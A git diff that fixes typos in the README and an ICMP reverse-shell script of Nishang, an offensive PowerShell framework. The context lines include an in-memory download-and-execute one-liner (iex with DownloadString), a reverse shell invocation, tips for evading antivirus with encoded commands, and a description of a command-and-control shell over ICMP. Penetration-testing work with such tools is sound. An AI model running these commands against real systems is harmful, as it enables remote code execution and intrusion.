diff --git a/README.md b/README.md index 04f5c9e..28c3c79 100644 --- a/README.md +++ b/README.md @@ -36,7 +36,7 @@ PS C:\nishang> Get-Help Get-WLAN-Keys -Full ``` #### Anti Virus -Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory: +Nishang scripts are flagged by many Anti Viruses as malicious. The scripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory: Method 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session. @@ -48,7 +48,7 @@ powershell iex (New-Object Net.WebClient).DownloadString('http:// Method 2. Use the `-encodedcommand` (or `-e`) parameter of PowerShell All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) `"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]"`. -Encode the scrript using Invoke-Encode from Nishang: +Encode the script using Invoke-Encode from Nishang: ```powershell PS C:\nishang> . \nishang\Utility\Invoke-Encode diff --git a/Shells/Invoke-PowerShellIcmp.ps1 b/Shells/Invoke-PowerShellIcmp.ps1 index 0ecce7c..8954480 100644 --- a/Shells/Invoke-PowerShellIcmp.ps1 +++ b/Shells/Invoke-PowerShellIcmp.ps1 @@ -2,7 +2,7 @@ function Invoke-PowerShellIcmp { <# .SYNOPSIS -Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP. +Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP. .DESCRIPTION This script can receive commands from a server, execute them and return the result to the server using only ICMP. @@ -16,7 +16,7 @@ The IP address of the server/listener to connect to. Time in seconds for which the script waits for a command from the server. Default is 5 seconds. .PARAMETER BufferSize -The size of output Buffer. Defualt is 128. +The size of output buffer. Default is 128. .EXAMPLE # sysctl -w net.ipv4.icmp_echo_ignore_all=1 @@ -78,7 +78,7 @@ https://github.com/samratashok/nishang $index = [math]::floor($sendbytes.length/$BufferSize) $i = 0 - #Fragmant larger output into smaller ones to send to the server. + #Fragment larger output into smaller ones to send to the server. if ($sendbytes.length -gt $BufferSize) { while ($i -lt $index )